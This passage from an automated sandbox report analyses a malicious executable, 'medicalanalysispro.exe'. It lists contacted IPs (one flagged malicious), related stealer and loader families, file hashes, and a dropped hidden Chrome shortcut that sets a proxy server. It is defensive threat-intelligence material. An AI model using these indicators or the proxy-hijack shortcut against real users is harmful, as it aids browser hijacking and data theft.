                                                                                                                                                                                                                    https://github.com/mgravell/protobuf-netmedicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/5906chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://anglebug.com/2517chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://anglebug.com/4937chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://issuetracker.google.com/166809097chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://issuetracker.google.com/200067929chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://anglebug.com/7847chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://anglebug.com/3832chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgmedicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://stackoverflow.com/q/2152978/23354medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://anglebug.com/6651chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://chrome.google.com/webstore?hl=en-GBWebchrome.exe, 00000011.00000002.2518041079.0000643402AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://anglebug.com/6574chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              194.58.203.20
                                                                                                                                                                                                                                              		gbg1.ntp.netnod.seSweden
                                                                                                                                                                                                                                              		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                                                                                                                                                                                              104.37.175.218
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		396073MAJESTIC-HOSTING-01UStrue
                                                                                                                                                                                                                                              5.2.81.126
                                                                                                                                                                                                                                              		erdogansigorta.comTurkey
                                                                                                                                                                                                                                              		3188ALASTYRTRfalse
                                                                                                                                                                                                                                              129.6.15.28
                                                                                                                                                                                                                                              		time-a-g.nist.govUnited States
                                                                                                                                                                                                                                              		49US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfalse
                                                                                                                                                                                                                                              129.134.25.123
                                                                                                                                                                                                                                              		time.facebook.comUnited States
                                                                                                                                                                                                                                              		32934FACEBOOKUSfalse
                                                                                                                                                                                                                                              216.239.35.4
                                                                                                                                                                                                                                              		time.google.comUnited States
                                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                                              129.250.35.250
                                                                                                                                                                                                                                              		x.ns.gin.ntt.netUnited States
                                                                                                                                                                                                                                              		2914NTT-COMMUNICATIONS-2914USfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              		unknownReserved
                                                                                                                                                                                                                                              		unknownunknownfalse

                                                                                                                                                                                                                                              Private

                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579551
                                                                                                                                                                                                                                              Start date and time:2024-12-22 23:55:07 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 9m 40s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:22
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:medicalanalysispro.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.phis.troj.spyw.evad.winEXE@31/10@7/9
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 71.4%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 73%
                                                                                                                                                                                                                                              • Number of executed functions: 341
                                                                                                                                                                                                                                              • Number of non-executed functions: 39
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 40.81.94.65, 17.253.14.251, 17.253.18.131, 17.253.18.99, 212.138.170.134, 172.217.19.227, 142.250.181.142, 173.194.220.84, 172.202.163.200, 13.107.246.63, 23.218.208.109
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): pool.ntp.org, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, time.apple.com, twc.trafficmanager.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, time.g.aaplimg.com, clients.l.google.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target svchost.exe, PID 5284 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              17:56:41API Interceptor13x Sleep call for process: medicalanalysis.exe modified
                                                                                                                                                                                                                                              17:56:54API Interceptor1x Sleep call for process: medicallanalysis.exe modified
                                                                                                                                                                                                                                              17:57:38API Interceptor1x Sleep call for process: wmprph.exe modified

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              194.58.203.20t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                  HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                    List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                        download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                          104.37.175.218file.exeGet hashmaliciousDarkTortilla, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              239.255.255.250GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                FnTSHWLNWB.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                  NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                129.6.15.28List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                  g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                        payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                            Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                                                                                                                                                                              mirai_nomiGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                SecuriteInfo.com.Other.Malware-gen.28386.14039.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.Other.Malware-gen.3200.4135.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                    129.250.35.250t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                      List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                        HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                            time-a-g.nist.govList of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            QP6s4u5SZ8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            2X3f1ykTmM.exeGet hashmaliciousKronosBrowse
                                                                                                                                                                                                                                                                                                            • 129.6.15.28
                                                                                                                                                                                                                                                                                                            gbg1.ntp.netnod.set5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            x.ns.gin.ntt.nett5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.250.35.250
                                                                                                                                                                                                                                                                                                            List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.250.35.250
                                                                                                                                                                                                                                                                                                            HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.250.35.250
                                                                                                                                                                                                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 129.250.35.250

                                                                                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                            NTP-SEAnycastedNTPservicesfromNetnodIXPsSEt5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.203.20
                                                                                                                                                                                                                                                                                                            regscs.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.200.20
                                                                                                                                                                                                                                                                                                            PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.200.20
                                                                                                                                                                                                                                                                                                            OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.200.20
                                                                                                                                                                                                                                                                                                            NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                                            • 194.58.200.20
                                                                                                                                                                                                                                                                                                            MAJESTIC-HOSTING-01USarmv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 191.96.140.106
                                                                                                                                                                                                                                                                                                            1CSDmJh1zN.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.221
                                                                                                                                                                                                                                                                                                            m58muJVjMg.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.221
                                                                                                                                                                                                                                                                                                            PCrn0I0aO9.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.232
                                                                                                                                                                                                                                                                                                            aHoqCI0AZq.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.221
                                                                                                                                                                                                                                                                                                            LJqzegzQl0.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.221
                                                                                                                                                                                                                                                                                                            ZtnN5sSpDk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.232
                                                                                                                                                                                                                                                                                                            wg7SDQAffQ.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.221
                                                                                                                                                                                                                                                                                                            Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.232
                                                                                                                                                                                                                                                                                                            098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                            • 104.37.175.232
                                                                                                                                                                                                                                                                                                            ALASTYRTRO65887cvz7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            Request for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236
                                                                                                                                                                                                                                                                                                            PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.84.236

                                                                                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ewinwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126
                                                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                            • 5.2.81.126

                                                                                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                                                                                            C:\Users\Public\Desktop\Google Chrome.lnk

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:36 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2418
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.5731188625851864
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:8SRd+cTeAT7RYrnvPdAKRkdAoEu00dAKRFdAKR/U:8SScSteEu
                                                                                                                                                                                                                                                                                                            MD5:435B0F4F46634E08C75BAA81C232A016
                                                                                                                                                                                                                                                                                                            SHA1:F4B060A9AA174D10E08644FC41D778A859CDD2B9
                                                                                                                                                                                                                                                                                                            SHA-256:E22CE5D31D403EA708E66D21193AB0D4E6EF7F4D0A831339FA21225F064D3AA0
                                                                                                                                                                                                                                                                                                            SHA-512:BB2BF297A4617A7290ED18F526D83CCF43F5884257FA268760AC29A71BF9B6961042809CEC73B67B6CFF89372A07837DFB22E8C51585F1E361D40AA916FA9621
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:L..................F.@.. ......,...............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWS`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWS`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWS`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWJ`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n...-.-.p.r.o.x.y.-.s.e.r.v.e.r

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\medicallanalysis.exe.log

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):605
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.358009436765127
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat/DLI4M/DLI4M6:ML9E4KlKDE4KhKiKhgLE4qE4j
                                                                                                                                                                                                                                                                                                            MD5:9F6A0F406F4A837DEE72C5ABC72990E1
                                                                                                                                                                                                                                                                                                            SHA1:08D2D0026E52C2DC752E4E624C970F80EB9119D3
                                                                                                                                                                                                                                                                                                            SHA-256:E87FCC8AF26C629E5029F3914CE065224940D9B6506ED04DBEA3B8EDCC49AA2D
